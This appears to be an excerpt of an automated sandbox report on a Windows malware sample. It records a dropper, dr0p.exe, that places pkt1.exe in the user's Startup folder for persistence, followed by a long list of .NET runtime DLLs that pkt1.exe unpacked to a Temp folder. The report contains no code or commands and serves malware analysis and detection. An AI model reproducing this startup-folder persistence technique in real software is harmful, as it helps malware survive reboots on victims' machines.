File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Jump to behavior

Source: C:\Users\user\Desktop\download\dr0p.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Jump to behavior

Source: C:\Users\user\Desktop\download\dr0p.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Memory allocated: 25674000000 memory reserve | memory write watch

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.CompilerServices.VisualC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Quic.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Serialization.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.XmlSerializer.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.InteropServices.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.TraceSource.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Private.Xml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.Encoding.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Data.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.HttpListener.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Text.Encoding.CodePages.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Contracts.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.OpenSsl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.DriveInfo.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Text.RegularExpressions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Pipes.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Process.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.Emit.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.VisualBasic.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Compression.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.WebProxy.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.NetworkInformation.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Mail.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.StackTrace.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.AccessControl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Resources.Reader.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.TypeConverter.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.AppContext.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ServiceProcess.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Transactions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Data.DataSetExtensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Serialization.Json.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Formats.Asn1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Debug.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.UnmanagedMemoryStream.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Formats.Tar.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Timer.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ValueTuple.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Compression.Brotli.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Drawing.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Buffers.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Linq.Expressions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.XmlDocument.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Serialization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Private.Uri.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Ping.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Web.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Configuration.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Serialization.Xml.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.WebHeaderCollection.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.Annotations.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.IsolatedStorage.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Private.Xml.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.CompilerServices.Unsafe.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.FileVersionInfo.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.NameResolution.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.Concurrent.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.SecureString.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.VisualBasic.Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Console.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ServiceModel.Web.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.TextWriterTraceListener.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.InteropServices.JavaScript.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.WebClient.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.FileSystem.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Text.Encoding.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Pipes.AccessControl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Text.Encoding.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Drawing.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Loader.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Channels.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Globalization.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.InteropServices.RuntimeInformation.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Sockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Runtime.Numerics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.AccessControl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.Cng.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Globalization.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Cryptography.X509Certificates.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ObjectModel.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Globalization.Calendars.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\WindowsBase.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Numerics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.IO.Compression.ZipFile.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Claims.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Transactions.Local.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.Specialized.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.Primitives.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Resources.Writer.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Security.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Requests.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Private.CoreLib.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Tasks.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.Win32.Registry.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.ReaderWriter.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Http.Json.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.EventBasedAsync.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.Emit.ILGeneration.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.XPath.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Security.Principal.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.ThreadPool.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\mscorlib.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.Tracing.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Threading.Tasks.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Reflection.DispatchProxy.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Data.Common.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.ServicePoint.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.Http.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Diagnostics.DiagnosticSource.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Xml.XPath.XDocument.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.NonGeneric.dll	Jump to dropped file
